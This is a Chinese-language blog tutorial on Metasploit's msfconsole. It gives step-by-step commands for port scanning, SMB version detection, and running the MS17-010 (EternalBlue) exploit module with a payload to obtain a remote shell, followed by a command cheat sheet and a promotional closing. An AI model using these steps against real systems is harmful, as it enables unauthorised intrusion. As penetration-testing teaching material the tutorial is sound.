首先我们可以通过在终端里面输入sudo su密码默认kali直接回车 让kali从普通用户变成root超级管理员用户避免权限不足
1.msfconsole介绍
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
2.msfconsole使用
msfconsole:启动metasploit命令行
打开 msfconsole
第一步:进行端口扫描
1.查看端口扫描的模块
search portscan
2.使用端口扫描模块
use auxiliary/scanner/portscan/top
3.使用端口扫描模块(模块里面的yes都要填)
show options
4.设置目标ip
set rhosts
5.设置线程为100
set threads 100
6.执行
run或exploit
这样open就是开放的端口,如图135和139
7.退出到msf
back
第二步:进行服务的扫描
1.查看smb_version
search smb_version
2.使用服务模板
use auxiliary/scanner/smb/smb_version
3.查看模块信息
show options
4.设置目标ip进行扫描
set rhosts目标ip
5.设置线程为10
set threads 10
6.执行
run或exploit
可以看到服务器信息
7.退出
back
3、使用ms17_010(永恒之蓝)进行复现
以永恒之蓝为例子 可以先搜索微软给的编号ms17_010 在use其中的一项
配置模块必选项 show options
*require为yes就是必选项
exploit漏洞攻击脚本 payload攻击载荷
lhost为kali地址 lport为端口 lport可以更改
set lport 0~65535
最后输入run开始运行
成功得到shell
4.一些命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
[show ]options/advanced – 查看该模块可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!